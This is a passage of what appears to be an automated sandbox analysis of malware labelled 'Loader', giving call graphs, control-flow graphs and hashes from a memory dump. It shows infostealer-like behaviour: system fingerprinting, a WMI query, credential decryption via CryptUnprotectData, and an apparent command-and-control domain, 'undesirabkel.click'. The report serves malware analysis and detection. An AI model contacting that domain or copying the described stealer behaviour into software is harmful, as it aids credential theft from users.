14215->14216 14217 441f20 LdrInitializeThunk 14215->14217 14218 4157f3 14215->14218 14223 41582f 14215->14223 14216->14210 14216->14218 14219 441fe0 LdrInitializeThunk 14216->14219 14216->14223 14217->14216 14220 441fe0 LdrInitializeThunk 14218->14220 14219->14218 14220->14223 14222 415b70 CryptUnprotectData 14222->14210 14222->14223 14223->14210 14223->14222 14234 43eba0 LdrInitializeThunk 14223->14234 14226 441f40 14224->14226 14225 441f8e 14225->14206 14226->14225 14236 43eba0 LdrInitializeThunk 14226->14236 14230 442000 14228->14230 14229 44204e 14231 4153b1 14229->14231 14238 43eba0 LdrInitializeThunk 14229->14238 14230->14229 14237 43eba0 LdrInitializeThunk 14230->14237 14231->14210 14231->14212 14231->14214 14234->14223 14235->14210 14236->14225 14237->14229 14238->14231 14239 42c4da 14241 42c4ed GetComputerNameExA 14239->14241 14362 43f123 14363 43f150 14362->14363 14364 43f18e 14363->14364 14368 43eba0 LdrInitializeThunk 14363->14368 14365 43f26e 14364->14365 14369 43eba0 LdrInitializeThunk 14364->14369 14368->14364 14369->14365 14370 42cca2 14371 42ccac 14370->14371 14372 42cd94 GetPhysicallyInstalledSystemMemory 14371->14372 14373 42cdd0 14372->14373 14373->14373 14243 421460 14244 4214c0 14243->14244 14245 42146e 14243->14245 14247 421580 14245->14247 14248 421590 14247->14248 14248->14248 14249 441da0 LdrInitializeThunk 14248->14249 14250 42167f 14249->14250 14374 43cb20 14375 43cb40 14374->14375 14376 43cc0e 14375->14376 14382 43eba0 LdrInitializeThunk 14375->14382 14378 43cac0 RtlAllocateHeap 14376->14378 14381 43cdae 14376->14381 14379 43ccc1 14378->14379 14379->14381 14383 43eba0 LdrInitializeThunk 14379->14383 14382->14376 14383->14381 14251 440ce0 14252 440d00 14251->14252 14252->14252 14253 440dcf 14252->14253 14255 43eba0 LdrInitializeThunk 14252->14255 14255->14253 14384 437426 14385 43742b 14384->14385 14386 437443 GetUserDefaultUILanguage 14385->14386 14387 43746c 14386->14387 14256 40cfe8 14257 40d050 14256->14257 14259 40d09e 14257->14259 14262 43eba0 LdrInitializeThunk 14257->14262 14261 43eba0 LdrInitializeThunk 14259->14261 14261->14259 14262->14259 14388 43ed29 14389 43ed32 GetForegroundWindow 14388->14389 14390 43ed46 14389->14390 14399 42c3ae 14400 42c3ba FreeLibrary 14399->14400 14402 42c3eb 14400->14402 14402->14402 14403 42c494 GetComputerNameExA 14402->14403 14404 42c4cf 14403->14404 14404->14404 14263 4085f0 14265 4085ff 14263->14265 14264 4087f0 ExitProcess 14265->14264 14266 408614 GetCurrentProcessId GetCurrentThreadId 14265->14266 14267 4087d9 14265->14267 14268 408643 SHGetSpecialFolderPathW 14266->14268 14280 43eb20 14267->14280 14271 4086d0 14268->14271 14271->14271 14272 43cac0 RtlAllocateHeap 14271->14272 14273 4086f7 GetForegroundWindow 14272->14273 14275 40876b 14273->14275 14275->14267 14277 40b470 FreeLibrary 14275->14277 14278 40b48c 14277->14278 14279 40b491 FreeLibrary 14278->14279 14279->14267 14283 440220 14280->14283 14282 43eb25 FreeLibrary 14282->14264 14284 440229 14283->14284 14284->14282 14285 43caf2 14286 43cb11 14285->14286 14287 43cb00 14285->14287 14288 43cb05 RtlFreeHeap 14287->14288 14288->14286 14289 426b70 14290 426b90 14289->14290 14291 426bde 14290->14291 14297 43eba0 LdrInitializeThunk 14290->14297 14293 43cac0 RtlAllocateHeap 14291->14293 14296 426cbe 14291->14296 14294 426c5c 14293->14294 14294->14296 14298 43eba0 LdrInitializeThunk 14294->14298 14297->14291 14298->14296 14405 40c5b6 CoInitializeEx CoInitializeEx 14299 433b7a 14300 433b7f 14299->14300 14301 433bb5 GetSystemMetrics GetSystemMetrics 14300->14301 14302 433bf4 14301->14302 14303 437c78 14304 437c7b 14303->14304 14306 437bc1 14303->14306 14309 438084 14304->14309 14311 43eba0 LdrInitializeThunk 14304->14311 14305 437bc9 14306->14305 14310 43eba0 LdrInitializeThunk 14306->14310 14310->14306 14311->14304 14406 40c73b CoInitializeSecurity 14407 42d0be 14409 42d0f0 14407->14409 14408 42d1be 14409->14408 14411 43eba0 LdrInitializeThunk 14409->14411 14411->14408

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 4396a0-4396ca 1 4396d0-439730 0->1 1->1 2 439732-439747 1->2 3 439750-4397bb 2->3 3->3 4 4397bd-4397ff 3->4 5 439800-43982a 4->5 5->5 6 43982c-43984b 5->6 8 439922-43992f 6->8 9 439851-43985f 6->9 10 439930-439957 8->10 11 439860-4398ca 9->11 10->10 12 439959-4399b3 CoCreateInstance 10->12 11->11 13 4398cc-4398df 11->13 14 4399b9-4399ea 12->14 15 439d5f-439d8f call 440690 GetVolumeInformationW 12->15 16 4398e0-439916 13->16 17 4399f0-439a11 14->17 22 439d91-439d95 15->22 23 439d99-439d9b 15->23 16->16 19 439918-43991d 16->19 17->17 20 439a13-439a3e SysAllocString 17->20 19->8 28 439a44-439a5e CoSetProxyBlanket 20->28 29 439d4e-439d5b SysFreeString 20->29 22->23 24 439dad-439db4 23->24 26 439dc0-439dd5 24->26 27 439db6-439dbd 24->27 30 439de0-439e15 26->30 27->26 31 439d44-439d4a 28->31 32 439a64-439a76 28->32 29->15 30->30 33 439e17-439e2f 30->33 31->29 34 439a80-439ace 32->34 35 439e30-439e44 33->35 34->34 36 439ad0-439b4a SysAllocString 34->36 35->35 37 439e46-439e69 call 41e540 35->37 38 439b50-439b64 36->38 42 439e70-439e77 37->42 38->38 40 439b66-439b94 SysAllocString 38->40 44 439d32-439d42 SysFreeString * 2 40->44 45 439b9a-439bbc 40->45 42->42 46 439e79-439e8c 42->46 44->31 52 439bc2-439bc5 45->52 53 439d28-439d2e 45->53 47 439e92-439ea5 call 408050 46->47 48 439da0-439da7 46->48 47->48 48->24 49 439eaa-439eb1 48->49 52->53 55 439bcb-439bd0 52->55 53->44 55->53 56 439bd6-439c1f VariantInit 55->56 57 439c20-439c37 56->57 57->57 58 439c39-439c47 57->58 59 439c4b-439c4d 58->59 60 439c53-439c59 59->60 61 439d17-439d24 VariantClear 59->61 60->61 62 439c5f-439c6d 60->62 61->53 63 439c6f-439c74 62->63 64 439cad 62->64 66 439c8c-439c90 63->66 65 439caf-439cd7 call 407fd0 call 408b00 64->65 77 439cd9 65->77 78 439cde-439cea 65->78 67 439c92-439c9b 66->67 68 439c80 66->68 70 439ca2-439ca6 67->70 71 439c9d-439ca0 67->71 73 439c81-439c8a 68->73 70->73 74 439ca8-439cab 70->74 71->73 73->65 73->66 74->73 77->78 79 439cf1-439d14 call 408000 call 407fe0 78->79 80 439cec 78->80 79->61 80->79
                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(0044468C,00000000,00000001,0044467C,00000000), ref: 004399AB
                                                                                                  • SysAllocString.OLEAUT32(C197C794), ref: 00439A18
                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00439A56
                                                                                                  • SysAllocString.OLEAUT32(B2ECBC14), ref: 00439AD9
                                                                                                  • SysAllocString.OLEAUT32(77B37587), ref: 00439B6B
                                                                                                  • VariantInit.OLEAUT32(BFBEBDA4), ref: 00439BDB
                                                                                                  • VariantClear.OLEAUT32(BFBEBDA4), ref: 00439D18
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00439D3C
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00439D42
                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00439D4F
                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00439D8B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                  • String ID: &v
                                                                                                  • API String ID: 2573436264-996230610
                                                                                                  • Opcode ID: c76a795488dcaea1087b38c4a21f4ec032b56208ede1dfedf05bb0fa22a11b63
                                                                                                  • Instruction ID: 2eae229d14a92933328e5725d2ae13478f160aa11d56bd9171fe0ff53e23d803
                                                                                                  • Opcode Fuzzy Hash: c76a795488dcaea1087b38c4a21f4ec032b56208ede1dfedf05bb0fa22a11b63
                                                                                                  • Instruction Fuzzy Hash: 4E22F072A083409FD714CF29C845B5BBBE6EFC9324F18992DE5958B381DB78D805CB86

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 85 415200-415217 86 415220-415228 85->86 86->86 87 41522a-415258 86->87 88 415261 87->88 89 41525a-41525f 87->89 90 415264-4152be call 407fd0 88->90 89->90 93 4152c0-4152e4 90->93 93->93 94 4152e6-4152ee 93->94 95 415311-415321 94->95 96 4152f0-4152f5 94->96 98 415341-415365 call 441c20 95->98 99 415323-41532a 95->99 97 415300-41530f 96->97 97->95 97->97 103 415550-415559 call 407fe0 98->103 104 415563 98->104 105 4153c3-4153cb 98->105 106 4155f2-4155f8 call 407fe0 98->106 107 415576-41558a 98->107 108 4155fb-415623 98->108 109 41556d-415573 call 407fe0 98->109 110 4155ec 98->110 111 41536c-415387 call 441f20 98->111 112 41538e-4153bc call 407fd0 call 441fe0 98->112 100 415330-41533f 99->100 100->98 100->100 103->104 104->109 120 4153d0-4153d8 105->120 106->108 119 415590-4155b4 107->119 115 415625-41562a 108->115 116 41562c 108->116 109->107 111->103 111->104 111->105 111->106 111->107 111->108 111->109 111->112 130 41576c 111->130 112->103 112->104 112->105 112->106 112->107 112->108 112->109 112->130 141 415780 112->141 142 415772-41577b call 407fe0 112->142 125 41562e-415687 call 407fd0 115->125 116->125 119->119 128 4155b6-4155be 119->128 120->120 129 4153da-4153f6 120->129 140 415690-4156e0 125->140 128->110 133 4155c0-4155cf 128->133 134 4153f8-4153fd 129->134 135 4153ff 129->135 138 4155d0-4155d7 133->138 139 415402-415489 call 407fd0 134->139 135->139 143 4155e0-4155e6 138->143 144 4155d9-4155dc 138->144 151 415490-4154d0 139->151 140->140 148 4156e2-4156f0 140->148 158 415855-415857 142->158 143->110 150 415c9f-415cae call 43eba0 143->150 144->138 149 4155de 144->149 154 415711-415721 148->154 155 4156f2-4156f7 148->155 149->110 171 415cb7 150->171 151->151 156 4154d2-4154de 151->156 160 415741-415765 call 441c20 154->160 161 415723-41572a 154->161 159 415700-41570f 155->159 163 415501-415511 156->163 164 4154e0-4154e5 156->164 165 419551-419558 158->165 159->154 159->159 160->130 160->141 160->142 160->158 172 4157c1 160->172 173 415800-41582f call 407fd0 call 441fe0 160->173 174 415844 160->174 175 4157c7-4157f6 call 407fd0 call 441fe0 160->175 176 415786-41578c call 407fe0 160->176 177 415886-415898 160->177 178 41578f-4157ba call 441f20 160->178 179 415838-41583d 160->179 180 41587d-415883 call 407fe0 160->180 181 41585c-415870 call 401000 160->181 166 415730-41573f 161->166 169 415533 163->169 170 415513-41551f 163->170 168 4154f0-4154ff 164->168 166->160 166->166 168->163 168->168 184 415537-41554a call 408a70 169->184 182 415520-41552f 170->182 183 415cba-415cf6 call 407fd0 171->183 173->179 174->158 175->173 176->178 186 4158a0-4158c4 177->186 178->172 178->173 178->174 178->175 178->177 178->179 178->180 178->181 179->174 179->177 179->180 179->181 193 415bb7-415c1f 179->193 194 4159cb-4159cf 179->194 195 415b9a-415b9e 179->195 180->177 181->180 182->182 192 415531 182->192 211 415d00-415d46 183->211 184->103 186->186 200 4158c6-4158ce 186->200 192->184 207 415c20-415c43 193->207 206 4159d0-4159d6 194->206 213 415bab-415bb4 call 407fe0 195->213 209 4158d0-4158df 200->209 210 41590a-415966 call 401a60 200->210 206->206 215 4159d8-4159f7 206->215 207->207 216 415c45-415c5c call 401da0 207->216 217 4158e0-4158e7 209->217 239 415970-4159a4 210->239 211->211 218 415d48-415d50 211->218 213->193 223 4159f9-4159fc 215->223 224 4159fe 215->224 216->177 216->180 216->193 216->194 216->195 216->213 242 415dd6-415ddc call 407fe0 216->242 243 415c69-415c6e 216->243 244 415ddf-415df8 call 440690 216->244 226 4158f0-4158f6 217->226 227 4158e9-4158ec 217->227 228 415d71-415d85 218->228 229 415d52-415d57 218->229 223->224 232 4159ff-415a0b 223->232 224->232 226->210 235 4158f8-415907 call 43eba0 226->235 227->217 234 4158ee 227->234 237 415db3 228->237 238 415d87-415d95 228->238 236 415d60-415d6f 229->236 240 415a12 232->240 241 415a0d-415a10 232->241 234->210 235->210 236->228 236->236 247 415dba-415dd0 call 408a70 237->247 246 415da0-415daf 238->246 239->239 248 4159a6-4159c4 call 401da0 239->248 251 415a13-415a2d call 407fd0 240->251 241->240 241->251 242->244 252 415c70-415c78 243->252 244->165 246->246 256 415db1 246->256 247->242 248->193 248->194 248->195 248->243 265 415a33-415a3a 251->265 266 415b34-415b93 call 440690 CryptUnprotectData 251->266 252->252 254 415c7a-415c96 252->254 254->171 262 415c98-415c9d 254->262 256->247 262->183 268 415a54-415aa0 call 41da20 * 2 265->268 266->193 266->195 266->213 266->242 266->243 266->244 275 415a40-415a4e 268->275 276 415aa2-415ab9 call 41da20 268->276 275->266 275->268 276->275 279 415abb-415aef 276->279 279->275 280 415af5-415b0f call 41da20 279->280 280->275 283 415b15-415b2f 280->283 283->275
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ("D-$54+*$8"D-$BxBG$U$^123$eH$iiat
                                                                                                  • API String ID: 0-2540653402
                                                                                                  • Opcode ID: ece7e7512deb2f3d0905023b68c116b96d26401af29463b746300dd7e0310da3
                                                                                                  • Instruction ID: 07982f48521f8885066ce7338b4bbbb716ab1cb9c22f471718dbf28f94ce43d7
                                                                                                  • Opcode Fuzzy Hash: ece7e7512deb2f3d0905023b68c116b96d26401af29463b746300dd7e0310da3
                                                                                                  • Instruction Fuzzy Hash: 5A5213B5909340CBD7249F24D895BEF77E2FFC5314F08492EE48A8B291E7389841CB96

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 284 423d40-423d95 285 423da0-423df3 284->285 285->285 286 423df5-423e38 RtlExpandEnvironmentStrings 285->286 287 423e40-423e73 286->287 287->287 288 423e75-423e7f 287->288 289 423ff0-423ff9 288->289 290 423fe0-423fe7 288->290 291 423e86-423e8c 288->291 292 4241b6-42425b 288->292 293 423ec5-423ecb call 407fe0 288->293 294 423edb-423ee4 288->294 295 423ece-423eda 288->295 296 423ebd 288->296 299 424002 289->299 300 423ffb-424000 289->300 290->289 301 423e95 291->301 302 423e8e-423e93 291->302 303 424260-424286 292->303 293->295 297 423ee6-423eeb 294->297 298 423eed 294->298 296->293 305 423ef4-423f28 call 407fd0 297->305 298->305 306 424009-4240af call 407fd0 299->306 300->306 307 423e98-423eb6 call 407fd0 RtlExpandEnvironmentStrings 301->307 302->307 303->303 308 424288-424298 call 421b10 303->308 318 423f30-423f63 305->318 319 4240b0-4240e2 306->319 307->289 307->290 307->292 307->293 307->294 307->295 307->296 317 42429d-4242a0 308->317 320 4242b0-4242dc 317->320 318->318 321 423f65-423f6d 318->321 319->319 322 4240e4-4240ec 319->322 320->320 323 4242de-424366 320->323 324 423f91-423f9d 321->324 325 423f6f-423f74 321->325 326 424111-42411d 322->326 327 4240ee-4240f5 322->327 328 424370-424391 323->328 330 423fc1-423fcc call 441da0 324->330 331 423f9f-423fa3 324->331 329 423f80-423f8f 325->329 333 424141-424161 GetLogicalDrives call 441da0 326->333 334 42411f-424123 326->334 332 424100-42410f 327->332 328->328 335 424393-4243b3 call 4216d0 328->335 329->324 329->329 342 423fd1-423fd9 330->342 336 423fb0-423fbf 331->336 332->326 332->332 333->320 343 4244c0 333->343 344 424180-424187 333->344 345 424190-4241a0 333->345 346 4243b6 333->346 347 42417a 333->347 348 424168-424172 333->348 349 4241ae 333->349 338 424130-42413f 334->338 335->346 336->330 336->336 338->333 338->338 342->289 342->290 342->292 343->343 344->345 345->349 351 4243b8-4243e4 346->351 347->344 348->347 349->292 351->351 352 4243e6-42446f 351->352 353 424470-424491 352->353 353->353 354 424493-4244b8 call 4216d0 353->354 354->343
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423E29
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00423EAB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: 0M9O$5]=_$y{
                                                                                                  • API String ID: 237503144-4183424673
                                                                                                  • Opcode ID: d1574f89f3c02ea997317bd1e207d191307d53352c373396b29da17b6e90c07b
                                                                                                  • Instruction ID: 3637a5695bacef2f7ae8854d885bc1190330819d14954c5e0cbca8e40a0a3ce6
                                                                                                  • Opcode Fuzzy Hash: d1574f89f3c02ea997317bd1e207d191307d53352c373396b29da17b6e90c07b
                                                                                                  • Instruction Fuzzy Hash: 0A02DAB46183409FE314DF65E88166FBBE1FBD1308F44892DE5C58B391EB788906CB56

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 484 4085f0-408601 call 43e300 487 4087f0-4087f2 ExitProcess 484->487 488 408607-40860e call 436400 484->488 491 408614-408641 GetCurrentProcessId GetCurrentThreadId 488->491 492 4087d9-4087e0 488->492 493 408643 491->493 494 408645-408649 491->494 495 4087e2-4087e8 call 407fe0 492->495 496 4087eb call 43eb20 492->496 493->494 497 40864b 494->497 498 40864d-4086c8 SHGetSpecialFolderPathW 494->498 495->496 496->487 497->498 501 4086d0-4086e4 498->501 501->501 503 4086e6-40871a call 43cac0 501->503 506 408720-40873c 503->506 507 408756-408769 GetForegroundWindow 506->507 508 40873e-408754 506->508 509 40879a-4087cd call 409830 507->509 510 40876b-408798 507->510 508->506 509->492 513 4087cf call 40c590 509->513 510->509 515 4087d4 call 40b470 513->515 515->492
                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00408614
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040861E
                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408696
                                                                                                  • GetForegroundWindow.USER32 ref: 00408761
                                                                                                    • Part of subcall function 0040B470: FreeLibrary.KERNEL32(004087D9), ref: 0040B476
                                                                                                    • Part of subcall function 0040B470: FreeLibrary.KERNEL32 ref: 0040B497
                                                                                                  • ExitProcess.KERNEL32 ref: 004087F2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 3676751680-0
                                                                                                  • Opcode ID: 21594b46850de91b9d7f1fcd097cf3db95484819d6bbf04f7650915a64ff1750
                                                                                                  • Instruction ID: e8cd0a5b1b6602d458645168f9022d0593551acc0d95c8fd4e55ee87bae5c504
                                                                                                  • Opcode Fuzzy Hash: 21594b46850de91b9d7f1fcd097cf3db95484819d6bbf04f7650915a64ff1750
                                                                                                  • Instruction Fuzzy Hash: 82418DB3B003004BD3186F798D15766B6C79BD5320F1E863EA895EB3DAEE789C054245

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 517 42c9d4-42c9ef 518 42c9f0-42ca0e 517->518 518->518 519 42ca10-42ca17 518->519 520 42ca2b-42ccd8 519->520 521 42ca19-42ca1f 519->521 524 42cce0-42cd23 520->524 522 42ca20-42ca29 521->522 522->520 522->522 524->524 525 42cd25-42cd2c 524->525 526 42cd4b-42cd57 525->526 527 42cd2e-42cd32 525->527 529 42cd71-42cd8f call 440690 526->529 530 42cd59-42cd5b 526->530 528 42cd40-42cd49 527->528 528->526 528->528 534 42cd94-42cdc9 GetPhysicallyInstalledSystemMemory 529->534 532 42cd60-42cd6d 530->532 532->532 533 42cd6f 532->533 533->529 535 42cdd0-42cdf2 534->535 535->535 536 42cdf4-42ce35 call 41e540 535->536 539 42ce40-42ce5c 536->539 539->539 540 42ce5e-42ce65 539->540 541 42ce67-42ce6b 540->541 542 42ce7b-42ce83 540->542 543 42ce70-42ce79 541->543 544 42ce85-42ce86 542->544 545 42ce9b-42cea8 542->545 543->542 543->543 548 42ce90-42ce99 544->548 546 42ceaa-42ceb1 545->546 547 42cecb-42cf1a 545->547 549 42cec0-42cec9 546->549 550 42cf20-42cf34 547->550 548->545 548->548 549->547 549->549 550->550 551 42cf36-42cf3d 550->551 552 42cf5b-42cf68 551->552 553 42cf3f-42cf43 551->553 555 42cf6a-42cf71 552->555 556 42cf8b-42d03d 552->556 554 42cf50-42cf59 553->554 554->552 554->554 557 42cf80-42cf89 555->557 557->556 557->557
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: OEpz$QFD3$rj
                                                                                                  • API String ID: 0-3969983622
                                                                                                  • Opcode ID: 578df49152ec6977c0559d99d18d55f56bbe5c8ef7ba284d461e40d52f2b5091
                                                                                                  • Instruction ID: 76e3eab801afa7748f5422476167f4aa7a66d4a79f7629f79f88f53e2f4321bc
                                                                                                  • Opcode Fuzzy Hash: 578df49152ec6977c0559d99d18d55f56bbe5c8ef7ba284d461e40d52f2b5091
                                                                                                  • Instruction Fuzzy Hash: AEA1047060C3D18ED3298F2994A03BBBFE19FA7304F58586EE0C997392D7798905CB56

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 558 42cca2-42ccd8 call 433150 call 407fe0 564 42cce0-42cd23 558->564 564->564 565 42cd25-42cd2c 564->565 566 42cd4b-42cd57 565->566 567 42cd2e-42cd32 565->567 569 42cd71-42cdc9 call 440690 GetPhysicallyInstalledSystemMemory 566->569 570 42cd59-42cd5b 566->570 568 42cd40-42cd49 567->568 568->566 568->568 575 42cdd0-42cdf2 569->575 572 42cd60-42cd6d 570->572 572->572 573 42cd6f 572->573 573->569 575->575 576 42cdf4-42ce35 call 41e540 575->576 579 42ce40-42ce5c 576->579 579->579 580 42ce5e-42ce65 579->580 581 42ce67-42ce6b 580->581 582 42ce7b-42ce83 580->582 583 42ce70-42ce79 581->583 584 42ce85-42ce86 582->584 585 42ce9b-42cea8 582->585 583->582 583->583 588 42ce90-42ce99 584->588 586 42ceaa-42ceb1 585->586 587 42cecb-42cf1a 585->587 589 42cec0-42cec9 586->589 590 42cf20-42cf34 587->590 588->585 588->588 589->587 589->589 590->590 591 42cf36-42cf3d 590->591 592 42cf5b-42cf68 591->592 593 42cf3f-42cf43 591->593 595 42cf6a-42cf71 592->595 596 42cf8b-42d03d 592->596 594 42cf50-42cf59 593->594 594->592 594->594 597 42cf80-42cf89 595->597 597->596 597->597
                                                                                                  APIs
                                                                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CD9C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InstalledMemoryPhysicallySystem
                                                                                                  • String ID: OEpz$QFD3$rj
                                                                                                  • API String ID: 3960555810-3969983622
                                                                                                  • Opcode ID: 9168ce1b262d27504dede28803dc24f1866231d49f4ce974e861d94e91dd2d20
                                                                                                  • Instruction ID: 843eda79264cd3607644ba2c6e9f51ffbc4283e049ce5635c5debb878d24e918
                                                                                                  • Opcode Fuzzy Hash: 9168ce1b262d27504dede28803dc24f1866231d49f4ce974e861d94e91dd2d20
                                                                                                  • Instruction Fuzzy Hash: E591157060C3D18ED3298F2994A03EBBFE1AF97304F58486EE0C997392D7798905CB56

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 627 409370-40937e 628 409384-4093ef call 405e80 call 407fd0 627->628 629 4097d7 627->629 635 4093f0-409436 628->635 630 4097d9-4097e5 629->630 635->635 636 409438-40945b call 408d10 635->636 639 409460-409485 636->639 639->639 640 409487-4094a4 call 408d10 639->640 643 4094b0-4094ce 640->643 643->643 644 4094d0-409505 call 408d10 643->644 647 409510-40955f 644->647 647->647 648 409561-40956b 647->648 649 409570-4095a1 648->649 649->649 650 4095a3-4095c8 call 408d10 649->650 653 4095d0-4095e4 650->653 653->653 654 4095e6-4096ae call 408f90 653->654 657 4096b0-4096e3 654->657 657->657 658 4096e5-4096ed 657->658 659 409711-40971c 658->659 660 4096ef-4096f7 658->660 662 409741-40976f 659->662 663 40971e-409721 659->663 661 409700-40970f 660->661 661->659 661->661 665 409770-409798 662->665 664 409730-40973f 663->664 664->662 664->664 665->665 666 40979a-4097af call 40bd10 665->666 668 4097b4-4097d5 call 407fe0 666->668 668->630
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ,-$DCA3EE5DEEF2F4191441EDD8E05CE3DA$T$g*V9
                                                                                                  • API String ID: 0-1823193842
                                                                                                  • Opcode ID: 86bf961c395ed7b7e07ea05ad14cc24c126058a6d268732374085c02ea76dcbd
                                                                                                  • Instruction ID: a0ce2b4ea5d82b238d504246632dfdecb4304a147a1c54da40f31a80d191d4bf
                                                                                                  • Opcode Fuzzy Hash: 86bf961c395ed7b7e07ea05ad14cc24c126058a6d268732374085c02ea76dcbd
                                                                                                  • Instruction Fuzzy Hash: ADC135B16083408BD718CF35C891A6BBBE5EFC2304F14496DE5D29B392DB38D90ACB56

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 672 433b7a-433c5b call 414690 GetSystemMetrics * 2 680 433c62-433cf6 672->680
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 4116985748-3916222277
                                                                                                  • Opcode ID: 66b7d6ddbbaea78e25287b155da9d8360f6552616883599e2b0a62f41b2dcca0
                                                                                                  • Instruction ID: 01f348f677623f89764fea340cc94f5095fd4e31d5590f1ad9612ee75e4100da
                                                                                                  • Opcode Fuzzy Hash: 66b7d6ddbbaea78e25287b155da9d8360f6552616883599e2b0a62f41b2dcca0
                                                                                                  • Instruction Fuzzy Hash: E05172B4D142089FCB40EFACD98569DBBF0BB88300F11852AE498E7310D774A984CF96
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Uninitialize
                                                                                                  • String ID: undesirabkel.click$x~
                                                                                                  • API String ID: 3861434553-2095430387
                                                                                                  • Opcode ID: e28907237b4d3a91ec5e118e2f9312d913e820380ba1de72427fa36cd9a4d49b
                                                                                                  • Instruction ID: 6343ddfc659097a6b1acf70417bf2a81d4440c70e9b0de2d3dfcc7ed75506984
                                                                                                  • Opcode Fuzzy Hash: e28907237b4d3a91ec5e118e2f9312d913e820380ba1de72427fa36cd9a4d49b
                                                                                                  • Instruction Fuzzy Hash: 32B146B1A047808FD319CF2AC4E0663BFA2EF9730571981ADC8D65F79AC7399806CB55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
